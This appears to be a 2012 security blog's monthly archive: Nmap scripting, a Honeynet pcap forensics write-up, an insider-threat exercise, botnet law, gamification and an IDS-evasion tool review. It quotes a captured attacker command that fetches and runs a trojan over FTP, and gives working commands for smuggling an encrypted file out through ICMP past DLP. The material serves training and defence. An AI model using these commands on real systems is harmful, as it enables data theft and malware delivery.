Monthly Archives: November 2012

Nmap 6 Scripting Engine with 400+ scripts

It was 1st of September of 1997, when Gordon Lyon released the article “The Art of Scanning” on the Phrack Magazine. This was the first release of the well known open source tool for network exploration and security auditing called Nmap. 15 Years later we have Nmap 6, NSE (Nmap Scripting Engine) and a bunch of books about the this powerfull tool.

Basically, I would like to introduce you to some of the Nmap Scripting Engine scripts available. The latest version bring more than 430 scripts. Let’s first install Nmap 6 and then use the NSE scripts. Using a Linux system, download the latest version of Nmap 6 from the official source code repository. To accomplish this task gcc, openssl and make should be part of your system. Subversion control versioning system is the best way to download the version and stay up2date.

$ cd /tmp/
$ mkdir nmap
$ svn co –username guest

Then you can use the configure script to set up the different variables and parameters. Then run make to compile the code and generate the binary files. When building Nmap from source you can use ./configure –help to see a complete list of directives available

$ cd nmap/
$/tmp/nmap# ./configure
$/tmp/nmap# make
$/tmp/nmap# install
$ nmap -V
Nmap version 6.20BETA1 ( )

Now that the latest version of Nmap is installed you should have around 430 scripts made with NSE under /usr/local.share/nmap/scripts. Among them you have scripts that allow you to check if a particular system is vulnerable to CVE-2012-1823, CVE-2012-2122, CVE-2012-1182 for PHP, MySQL and Samba services respectively.

Other ones are related to GeoIP and one particular interesting is called ip-geolocation-maxmind. This one gives you the ability to retrieve the Geo location of the IP you are scanning using the Maxmind database. To be able to run this script you first need to download the GeoLiteCity into /usr/local/share/nmap/nselib/data folder.

$cd /usr/local/share/nmap/nselib/data
$ wget -N -q
$ gunzip GeoLiteCity.dat.gz

$nmap –script ip-geolocation-maxmind  -p 80
Host script results:
| ip-geolocation-maxmind:
|   coordinates (lat,lon): 47.3667,8.55
|_  city: Zurich, Switzerland

Other than the GeoIP you can also retrieve the Whois Information Records without running a port scan.
$ nmap –script whois -v -Pn -sn
Host script results:
| whois: Record found at
| netrange: –
| netname: LVLT-STATIC-4-4-16
| orgname: Level 3 Communications, Inc.
| orgid: LVLT
| country: US stateprov: CO
| orgtechname: ipaddressing

You can even further extend the use of Maxmind free services and download the GeoIPCountry.csv file. Then feed it into Nmap to scan a range of IP addresses for a particular Country.
Looking at the contents of the file we can easily grep for the IP addresses for a particular country.
head GeoIPCountryWhois.csv

Next, cat the file, grep for the string you want in this case Portugal. Then use AWK with “,” as delimiter, print field 1 and 2. Pipe that into tr and delete the character ‘. Write the output into the file IP.Addresses.PT.

$cat GeoIPCountryWhois.csv | grep Portugal | awk -F “,” ‘{print $1 “-” $2}’ | tr -d ‘”‘ > IP.Addresses.PT
root@bt:/tmp/nmap/nselib/data# head IP.Addresses.PT

Now, we need to change the format of the file in order to be readable by Nmap. We need to change from “” to “2-2.80-80.0-18.0-255”.
To do that we use Awk with the split arguments. From the man page of Awk :

split(string, array, fieldsep)
This divides string into pieces separated by fieldsep, and stores the pieces in array. The first piece is stored in array[1], the second piece in array[2], and so forth. The string value of the third argument, fieldsep, is a regexp describing where to split string (much as FS can be a regexp describing where to split input records). If the fieldsep is omitted, the value of FS is used. split returns the number of elements created. The split function, then, splits strings into pieces in a manner similar to the way input lines are split into fields.

If you want to understand better this command I recommend to read carefull the previous paragraph .
$cat IP.Addresses.PT | awk -F “.” ‘{split($4,array,”-“); print $1”-“array[2]”.”$2″-“$5 “.” $3″-“$6″.”array[1]”-“$7}’  > IP.Addresses.PT.nmap

The output will be:
head IP.Addresses.PT.nmap

Now that we have the information parsed according to the Nmap expected format you can use another NSE script. This time the http-open-proxy which tries to identtify systems that will allow you to proxy connections. We can now scan per country ! The -Pn will scan the hosts even if they dont respond to icmp requests. and the -iL is to specify a list of hosts. The -p specifies the ports.

$nmap -Pn –script=http-open-proxy -iL IP.Addresses.PT.nmap -p 8080,3128

Another cool script is http-google-malware which checks if hosts are on Google’s blacklist of suspected malware and phishing servers. These lists are constantly updated and are part of Google’s Safe Browsing service. To be able to run this script you need to sign up for the Safe Browsing API. You can check manually the Safe Browsing functionality with the URL : . Replace the with the site you want to check.

After you have your API key you can run the following command :

$nmap -Pn -p80  –script http-google-malware –script-args http-google-malware.api=
80/tcp open  http
|_http-google-malware.nse: Host is known for distributing malware

For each NSE script there are additional arguments that you can run with –script-args prefix. The best source of information about them is the .nse file itself  under /usr/local.share/nmap/scripts.

Tagged , ,

Hands-on Lab – eCommerce – Part 1

An important aspect of network security is hands-on experience. Considering this I would like to share a step-by-step guide that illustrates how to create a web content management system with eCommerce shopping card software. What is the purpose? The purpose is to create a simulated real world e-commerce website in a controlled and virtual environment. Here you can find known vulnerabilities that will allow you to learn and practice security concepts.  Will also allow you to have a scenario where you can practice offensive and defensive techniques legally, safely and for educational purposes. The scenario is based on an older version of Joomla and Virtuemart running on a LAMP (Linux, Apache, MySQL, PHP) stack.

Probably the most common attack vector against Joomla based content management websites is SQL injection vulnerabilities. The National Vulnerability Database shows 755 matching records when searching for CVE’s affecting Joomla versions. ExploitDB shows 839 potential exploits for different Joomla versions and a variety of components. 487 SQL Injection related, 30 Cross Site Scripting  42 Local File Inclusion, 25 Remote File Inclusion and others. If you are familiar with Vmware this scenario can easily be extended to an Attacker system with Backtrack plus a Firewall like pfSense and/or IDS like Snort between the systems. This will allow you to further extend your skills in intrusion analysis, incident handling and penetration testing and others.

Tagged ,

Attack Trace – Honeynet challenges – Part 1

[This one is going to be really hands-on with bits and bytes. Hopefully, will allow you to reinforce and learn new skills about tshark and other tools. Optimistically, you can use this skills on your day to day job when doing Intrusion Detection and Analysis. I learned quite some stuff. If you are willing to devote some extra neurons and practice your intrusion detection and analysis skills, go for it. I runned the analysis on a backtrack linux distro.]

Honeynet is a security research organization, non-profit, dedicated to investigating attacks. This organization has been around for more than one decade. The cool stuff is that they provide Challenges to give you the opportunity to analyze these attacks, practice your skills, learn new tools and share your findings. Honeynet claim that these attacks are from real hacks which makes it even more fun.

On 18 Jan. 2010 Honeynet Project released a challenge called “pcap attack trace” with the goal to investigate a network attack. This is the one I will focus today. The packet capture can be found here. Of course the solutions and write ups are available so don’t spoil yourself too much. The question 8 for me was the most difficult and still need to learn more about the topic.

1. Which systems (i.e. IP addresses) are involved?
Powerful tshark tool to run in quite mode (-q) and print the hosts tree statistics (-z ip_hosts,tree) from the pcap file will give you the IP addresses involved.
$tshark -r attack-trace.pcap -q -z ip_hosts,tree

2. What can you find out about the attacking host (e.g., where is it located)?
Other than using whois you can also use tshark with “-R” to apply visualization filters like you do in wireshark. Plus the “-T fields” wich allows to display only the contents of the selected field in this case “smb.native_os” which exists under SMB protocol and specifies the OS. Then pipe the contents of it into “uniq”
$tshark -r attack-trace.pcap -R ‘ip.src==’ -T fields -e smb.native_os | uniq -c

3. How many TCP sessions are contained in the dump file?
Print the statistics about TCP conversations from pcap. which show 5 TCP sessions.
$tshark -r attack-trace.pcap -q -z conv,tcp -nn

4. How long did it take to perform the attack?
Tshark with “-t” will print the elapsed value in seconds. The last packet will show how long it took. Aprox. 16s
$tshark -r attack-trace.pcap -t r | tail -n 1

5. Which operating system was targeted by the attack? And which service? Which vulnerability?
Troughout the analysis you can see that OS is Windows XP, Service is Microsoft DS and Vulnerability is MS04-11.

7. What specific vulnerability was attacked?
Analyze the pcap file with Snort using default configuration file and log the output in full mode. This will give you good details about it.
$ sudo snort -r attack-trace.pcap -c /etc/snort/snort.conf -l /tmp/ -A full
$ cat /tmp/alert

[**] [1:2514:7] NETBIOS SMB-DS DCERPC LSASS DsRolerUpgradeDownlevelServer exploit attempt [**]
[Classification: Attempted Administrator Privilege Gain] [Priority: 1]
04/19-22:28:30.172468 ->
TCP TTL:113 TOS:0x0 ID:15421 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x8CFFA9C Ack: 0x5BD511D9 Win: 0xF7D6 TcpLen: 20
[Xref => => =>

8. What actions does the shellcode perform? Pls list the shellcode.
This is the difficult one. I must admit it goes beyond my current skills and will need more time to learn. I needed some help and used the exisiting writeups for guidance. Basically, if you look closer to the capture, especially the stream 1, some of the packets look suspicious due the NOP slides (0x90) throughout the packets. This instructions are common in buffer overflow exploits and others. The “-x” prints the hex and ASCII, the “-V” its for verbose output.
$tshark -r attack-trace.pcap -R ‘ == 1’ –x
$tshark -r attack-trace.pcap -R ‘frame.number==29’ –xV
00c0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
00d0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
00e0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
00f0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
0100 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
0110 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
0120 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
0130 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
0140 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
0150 90 90 eb 10 5a 4a 33 c9 66 b9 7d 01 80 34 0a 99 ….ZJ3.f.}..4..

Ok, so we want to extract just the interesting data from frame 29 which represents the shellcode.
$tshark -r attack-trace.pcap -R ‘frame.number==29’ -T fields -e
(..) 90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90 (..)

Now we can try to get more information about. For example pipe the extract of “” from frame 29 into “sed” to substitute the “:” with “\x”. Then will be in a format readable by the disasembler ndisasm. The ndisasm will disassemble the binary in 32bit fashion. On the output you can see that the shellcode starts with xor instruction and trough out the list you find that the shellcode is encoded using XOR.

$tshark -r attack-trace.pcap -R ‘frame.number==29’ -T fields -e | sed ‘s/:/\\x/g’ | ndisasm -b 32 –
00000000 3030 xor [eax],dh
00000002 5C pop esp
00000003 7830 js 0x35
00000005 305C7830 xor [eax+edi*2+0x30],bl
00000009 635C7866 arpl [eax+edi*2+0x66],bx
0000000D 345C xor al,0x5c

To decode XOR you can do similar extract but now pipe the into “xxd”. xxd with “-r -p” will allow to reverse hex into binary using postscript output.
$tshark -r attack-trace.pcap_ -R ‘frame.number==29’ -T fields -e | xxd -r -p | xxd
0000110: 9090 9090 9090 9090 9090 9090 eb10 5a4a …………..ZJ
0000120: 33c9 66b9 7d01 8034 0a99 e2fa eb05 e8eb 3.f.}..4……..
0000130: ffff ff70 9598 9999 c3fd 38a9 9999 9912 …p……8…..

Finally if you pipe the contents of the binary into the disasembler you will have the shellcode instructions. But now decoded. This was how far I could go with time limitations.
$tshark -r attack-trace.pcap -R ‘frame.number==29’ -T fields -e | xxd -r -p | ndisasm -b 32 –

0000011C EB10 jmp short 0x12e
0000011E 5A pop edx
0000011F 4A dec edx
00000120 33C9 xor ecx,ecx
00000122 66B97D01 mov cx,0x17d
00000126 80340A99 xor byte [edx+ecx],0x99

9. Do you think a Honeypot was used to pose as a vulnerable victim? Why?
If you use passive fingerprinting analysis into the pcap it will tell you that the victim is running Linux, however it has a microsoft vulnerability. We can assume that its a honeypot.

$ sudo p0f -s attack-trace.pcap  ‘src’
p0f – passive os fingerprinting utility, version 2.0.8
(C) M. Zalewski <>, W. Stearns <>
p0f: listening (SYN) on ‘attack-trace.pcap_’, 262 sigs (14 generic, cksum 0F1F5CA2), rule: ‘src’. – Linux 2.6 (newer, 3) (up: 11265 hrs)
-> (distance 0, link: ethernet/modem)
[+] End of input file.

10. Was there malware involved? Whats the name of the malware? (We are not looking for a detailed malware analysis for this challenge).
There is extra file downloaded using FTP after the compromise of the system. You can see on stream 2 and 3 details about it.

$tshark -r attack-trace.pcap -R ‘’ -T fields -e data.text

echo open 8884 > o&echo user 1 1 >> o &echo get ssms.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &ssms.exe\x0d\x0a

$ tshark -r attack-trace.pcap -R ‘’ -T fields -e data.text

220 NzmxFtpd 0wns j0\x0a
USER 1\x0d\x0a
331 Password required\x0a
PASS 1\x0d\x0a
230 User logged in.\x0a
215 NzmxFtpd\x0a
TYPE I\x0d\x0a
200 Type set to I.\x0a
PORT 192,150,11,111,4,56\x0d\x0a
200 PORT command successful.\x0a
RETR ssms.exe\x0d\x0a
150 Opening BINARY mode data connection\x0a
226 Transfer complete.\x0a
221 Goodbye happy r00ting.\x0a

Other than that, on stream4 there is a Windows executable that is easily identified by its file signature (magic number) wich contains “MZ” string. There are a variety of tools to extract and do carving of pcap files. I used “foremost”  to extract it.

$ foremost -i attack-trace.pcap
Processing: attack-trace.pcap

$ ls output/exe/
$ file output/exe/00000021.exe
output/exe/00000021.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

Finally you can download Clamav (Sourcefile opensource AV) into your system and scan the executable file.

$ sudo apt-get install clamav clamac-freshclam
$clamscan output/exe/00000021.exe
00000021.exe: Trojan.SdBot-9861 FOUND.

Tagged ,

Countermeasures against Botnets – Legal aspects

The NATO Cooperative Cyber Defense Centre of Excellence based in Tallinn, Estonia just released a study about the legal implications of passive and active countermeasures against botnets. This investigation is made in collaboration with European Network and Information Security Agency (ENISA). It covers the legal aspects of fighting against botnets taking into account the German and Estonian law.  The study was created by two legal experts, one attorney, two scientists and a post-graduate civil service trainee. It’s very well written and it uses an interdisciplinary language which makes it accessible to people who aren’t specialist in information technology or legal.

It covers a variety of interesting topics such as assuming a system is compromised by a botnet. One of the steps, as part of the incident handling process, is that you might capture and inspect the traffic in order to detect and analyze the botnet traffic. However, from a legal perspective the study presents a variety of legal concerns regarding this. Some of them are personal data protection, unauthorized surveillance and confidentiality of communications. It means such monitoring might be perceived as breach of criminal law.  Even if some of the laws were not written in light of cyber space it still can apply.

Another topic with very unique characteristics and legal concerns is running a honeypot to collect, store and process data to learn about botnets. What are the legal concerns about sharing the data gained from running the honeypot? Or how it can be challenging for a private researcher to prove that the data he is collecting is for scientific interests.  These and other legal concerns are discussed in the study.

How about the takeover of botnets? Which assumes you successful infiltrated the CnC server. If the Botnet is taken over with the intent to eliminate and prevent crime and not prepare one, it still has implications under criminal law. Given the uncertainty of jurisdictional traits on how to handle such situations there is the risk of someone making him susceptible to prosecution. Other topics include: Takedown of Command and Control Servers, Automated Immunization or Disinfection, Botnet Mitigation Techniques under Exceptional Circumstances, Duty to Act against Botnet Attacks and Liability of Owners of Infected Hosts.

Apart of that, through out the study there are excellent reference’s that provide supporting and corroborating evidence of their assertions. Definitely a must read for security professionals involved in incident handling and others.

Tagged , ,

Insider Threat – Dee Cypher

On my previous post I wrote about gamification and how it can be used to learn security skills. Let’s further illustrate this with a challenge that represents the risks of insider threats. Exfiltrating data using covert channels. A typical case of espionage:

Justin Case, a high-priced lawyer and an operative for V.I.L.E. found that ACME is working on a new high-profile deal. Justin Case wants to get the hands on that information to sell it to the competitors. He just contacted another operational from V.I.L.E. Dee Cypher who has insider access to ACME. His mission is to smuggle confidential information bypassing the high end security controls in place like Firewalls and Data Lost Prevention. During a secret venue they shared some information: The ACME is running the latest version of Checkpoint Firewall with rigid rules however it allows ping requests to me made with a maximum ping size protection of 1400 bytes. Also to bypass DLP inspection they agreed that the information should be sent encrypted using symmetric encryption AES 256 bits with a shared secret that they agreed upon.

How can Dee Crypt and Justin Case accomplish this mission?

DeeCypher$ md5sum SecretPlans.pdf
0c376606bbbca8f089151df189edfd8b SecretPlans.pdf
DeeCypher$ openssl enc -e -aes-256-cbc -in SecretPlans.pdf -out SecretPlans.enc
DeeCypher$ ls –lrta
-rw-r–r– 1 DeeCypher DeeCypher 30800 2012-11-17 15:49 SecretPlans.enc
DeeCypher$ echo ‘scale=2;30800/1400’ | bc –q
DeeCypher$ sudo hping3 -E SecretPlans.enc -1 -u -d 1400 -c 22

JustinCase$ sudo tcpdump -nni eth0 -s0 proto 1 -w receiving.pcap
JustinCase$ tshark -r receiving.pcap -R ‘icmp.type==8’ -w data.pcap
JustinCase$ tshark -r data.pcap -T fields -e data | xxd -r -p > SecretPlans.enc
JustinCase$ openssl enc -d -aes-256-cbc -in SecretPlans.enc -out SecretPlans.pdf
JustinCase$ md5sum SecretPlans.pdf
0c376606bbbca8f089151df189edfd8b SecretPlans.pdf
JustinCase$ acroread SecretPlans.pdf

Lets describe the commands of Dee Cypher. First, the md5 of SecretPlans.pdf was produced, which can then be used to verify the file integrity. Next, the file SecretPlans.pdf was encrypted using AES-256-CBC algorithm resulting into SecretPlans.enc. Then, SecretPlans.enc was checked and it contains 30800 bytes. Now he wanted to know how many ICMP packets he will need to send the contents of the file using a payload of 1400 bytes. To do this he used the precision calculator bc in quiet mode. Divided the total amount of the file size by the size of the payload. The result was formatted to show two digits after the decimal point, it’s 22. It means, he will need to send 22 packets to send the whole contents of the file. To forge the ICMP packets hping3 was used. It’s specified the filename that will fill packet data, the traffic type using icmp mode with a data size of 1400 and a total of 22 packets.

On the other end, JustinCase executed tcpdump to capture ICMP traffic with no limit on the captured packet size. He extracted the traffic, using tshark, that matched wireshark filter ICMP Echo Request (type 8) and wrote it into data.pcap. Then, extracted the data portion of the ICMP payload. The output of this command was piped into xxd to convert the data into binary using plain hexdump style. The file was decrypted using the same algorithm and finally integrity was checked and the file was opened with acrobat reader.

Note: On this example a Checkpoint R75 with IPS and DLP blade enable was used. The IPS had configured a Max Ping Size of 1400 bytes.  By default the IPS does not have the Max Ping Size protection enable and the default value is 2500 bytes. Further, the ICMP traffic is not covered by DLP inspection which means the data could be sent in clear text instead of encrypted.

After having fun and eventually engage people to challenge this with other possibilities and tools let’s think about it. This example demonstrates that insider threat should be a serious concern by today organizations. In this case Intellectual property or confidential information could be stolen. Understanding how susceptible you are to insider threat is a valuable step in order to develop controls to detect, remediate and mitigate. Access to information outside of need to know, unauthorized encryption of information, unauthorized information transfer are examples of technical actions and indicators that could be used in this case as observables for a possible detection.

In 2006, the CERT coordination center which is located at Carnegie Mellon University released a technical report “Comparing Insider IT Sabotage and Espionage: A model-based analysis‘. This study considered not only the technical factors that contribute to Espionage and Sabotage cases but also the psychological, organizational and contextual factors. It’s definitely a good read for security professionals and leaders with responsibility on the organization security posture. Other than that the CERT Insider Threat Centers provides comprehensive and detailed information about this topic.

Tagged , , ,


NetWars logo used with permission from SANSUser engagement, return on investment and learning. Those are key benefits of gamification. Gamification might be a new term but it has been used on specific industries since years. One example is the militaries that have been using games, challenges and simulations to resolve problems and engage audiences.  NATO is considering gamification using the Internet. The Office of Naval Research a department from the US Navy recently ran a Massive Multiplayer Online Wargame Leveraging the Internet. Deloitte call it the engagement economy.

Gabe Zichermann and Christopher Cunningham on the preface of their latest book wrote that “Simulation and gaming is a promising, and rapidly-expanding, field of study. This new methodology is being adopted in a wide variety of disciplines. Complicated computer models have helped inform everything from finance to engineering, a new wave of “serious games” have begun to change the way we think about gaming as a told for learning, and true-to-life simulations have changed the way professionals train for intensive, on the job-skills.”

Then, how can we use and apply gamification to information security? Well, learning information security skills through gamification is what this post is about. And is where NetWars comes in. NetWars is a product from SANS and it illustrates how gamification can be used to help you increasing your information security skills. The concept is not new and there are others. Similar is the Overthewire and Smasthestack challenges, which are also known as capture the flag or wargames. However, NetWars was made by Ed Skoudis. That alone is already a differentiator. Last year at London, SANS hosted the first EMEA Netwars tournament session. It consisted of 5 levels, where each one consists of several challenges that will give you points from 1 to 15 based on its difficulty. To be able to pass to the next level you need to reach a certain threshold. The levels are designed to help participants develop skills areas such as Vulnerability Assessments, System Hardening, Malware Analysis, Digital Forensics, Incident Response, Packet Analysis and Penetration Testing.

Should business leaders invest in this type of simulations to train their employees? Absolutely, the marriage between pedagogy and technology is a fact. In addition from a pure return on investment, employee training might be the best business expense.  According to Professor Bartel, who is the Director of Columbia Business School’s Workforce Transformation Initiative and an expert in the field of labor economics and human resource management. The estimated return on employee training range from 7% to 50% per dollar spent and on two specific case studies it can grow with returns of 100% to 200% on investment. Further details on her paper “Measuring Employer Return on Investments in Training”.

To give you an example on how gamification can be used to engage people and learn. You might remember, back in 90s, there was a famous video game called Where in the World is Carmen Sandiego?. The game challenges player to track the thief who is hiding out in one of 30 cities using a world almanac as investigative tool (for example, “What country uses keroner as its currency?  Check your connections to find out which cities the thief might have fled to). The game basically teaches you knowledge of world geography and cultures.

But back to NetWars and his director, Ed Skoudis, check his presentation on “Using InfoSec Challenges to build your skills and career”. Among others the presentation describes the benefits of gamification information security challenges. The presentation also provides guidelines on how to develop your own challenges and simulations.

Teaching and training systems like NetWars are designed to mimic real life situations. In this case it represents real-world security issues with their respective flaws and resolutions on an  interactive and hands-on laboratory environment. Historically books contain theories and examples. But with simulations, challenges and games, the dynamic and a temporal element can be added. It will also allow difficult concepts to be vibrantly illustrated.

Zichermann, Gabe; Cunningham, Christopher (2011) : Gamification by Design : O’Reilly
Information Resources Management Associations (2011) :Gaming and Simulations : IGI Global

Tagged , , , , , ,


Evader is a tool produced by Stonesoft which provides a ready-made test lab to test IP evasion techniques. Stonesoft claims that this tool should be used to test your network security solutions effectiveness against the protection and detection of threats. Other than marketing and hype, Stonesoft as always provided innovative solutions in the network security market. You might remember the old days of Stonebeat Full cluster software that was used by vendors like Checkpoint to create high availability and load sharing scenarios.

The evader tool has the ability to test IP evasion techniques against two vulnerabilities: CVE-2004-1315 and CVE-2008-4250. For the first one, the tool has available 24 evasion methods which 9 are at application layer, 2 at network layer and 13 at the transport layer. The test lab cover CVE-2004-1315 and it can be easily downloaded and deployed using VMware. The documentation is clear and provides step-by-step guidance.

Essentially, the virtual machine contains an installed Linux, Apache, MySQL, Php and as deployed the PHP Bulletin Board version 2.0.10. This application is vulnerable to CVE-2004-1315. The Santy worm back in 2004 used this vulnerability to abuse and deface websites.

In the tested version of evader the available evasion technques are:

http_header_lws – HTTP header linear whitespace
http_known_user_agent – HTTP known user agent
http_request_line_separator – HTTP request line separator
http_request_method – HTTP request method
http_request_pipelined – HTTP request pipelined
http_url_absolute – HTTP URL absolute
http_url_dummypath – HTTP dummy paths
http_url_encoding – HTTP URL encoding
http_version – HTTP request version
ipv4_frag – IPv4 fragmentation
ipv4_opt – IPv4 options
tcp_chaff – TCP Chaff
tcp_initialseq – TCP initial sequence number
tcp_inittsopt – TCP timestamp option settings
tcp_nocwnd – Disable TCP congestion avoidance
tcp_nofastretrans – Disable TCP fast retransmit
tcp_order – TCP segment order
tcp_overlap – TCP segment overlap
tcp_paws – TCP PAWS elimination
tcp_recv_window – TCP receive window
tcp_seg – TCP segmentation
tcp_timewait – TCP TIME-WAIT decoys
tcp_tsoptreply – TCP timestamp echo reply modifications
tcp_urgent – TCP urgent data

I decided to take a deeper look and downloaded the evader version After that created a small lab to test the tool against the Checkpoint product with Firewall and IPS blade enable. Mainly, I created an account on Checkpoint User Center and requested a trial license of 15 days and downloaded the ISO image of Checkpoint R75.40 with software blades. Installed the system as Security Gateway and Security Management Server. Configured IP addressing, rules and routing to suit test scenario. The lab setup wouldn’t take long if you are familiar with Vmware and Checkpoint.

Interesting is that, either default or recommended IPS profile from Checkpoint R75.40 does not catch the attack used against CVE-2004-1315. I used evader and metasploit. Looking deeper at signatures from Checkpoint Web Intelligence – Malicious codes – General HTTP worm catchers, the signature that eventually should catch this attack is called Sanity.A Worm. However, the regular expression available for this attack needs to be adjusted.  After that the attack is successful detected and/or prevented. From the moment that the security solution detects  the attack we can start using the evasion techniques to test its effectiveness. In this case, after having the signature configured properly on the Checkpoint IPS the evasion techniques I tried (time limitation was a factor) were all detected/prevented. With an overall protection score of 98.3% on the NSS labs report that would be the expected result.

Understanding threats, identify their causes and implement effective countermeasures takes time but will help you reducing risk and exposure. With this I mean that its generally worth doing your assessment and use this kind of tools against the security products that protect you assets to have a better understanding of the technical advantages and drawbacks. Security companies want to make you think you are as secure as possible and that eventually provides you a false sense of security.

If you are interested in intrusion analysis and/or configuring IDS/IPS systems. If you would like to have a peek behind the scenes on how the packets look like when crafted with  evasion techniques such as fragmentation attacks or obfuscation. Then evader is definitely a good start. The tool illustrates quite well a significant amount of attack vectors. You can use it to complement frameworks like Metasploit to learn or reinforce skills about evasion techniques.

[2017-02-10]: The Evader tool is no longer available but I kept a copy here: Evader, for the ones that are interested in playing with it.

In addition to this write up, the following references will give all you need to acquire more knowledge about Intrusion Detection Evasion:

Insertion Evasion and Denial of Service Eluding Network Intrusion Detection
Ptacek & Newsham, 1998

The Base-Rate Fallacy and its Implications for the Difficulty of Intrusion Detection
Stefan Axelsson, 1999

A Strict Anomoly Detection Model for IDS
sasha / beetle, 2000

Network Intrusion Detection: Evasion, Traffic Normalization, and End-to-End Protocol Semantics
Handley & Paxton, 2001

IDS Evasion Techniques and Tactics
Kevin Timm, 2002

Combining Evasion Techniques to Avoid Network Intrusion Detection Systems
Gorton & Champion, 2003

Intrusion Detection System (IDS) Evasion
VeriSign, 2006

Thermoptic Camouflage: Total IDS Evasion
Caswell & Moore, 2006

HD Moore, CanSecWest 2006

How to test an IPS
Renaud Bidou,2006

Networks Environment Detection of DDoS and IDS Evasion Attacks in a High-Speed
Oh, Park Jang & Jeon, 2007

Advanced Evasion Techniques: New Methods and Combinatorics for Bypassing Intrusion Prevention Technologies
Boltz Jalava & Walsh, 2010

Active Mapping : Resisting NIDS Evasion without Altering Traffic
Umesh Shankar, Vern Paxson

Intrusion Detection FAQ: How does Fragroute evade NIDS detection?
Michael Holstein

Tagged , , , ,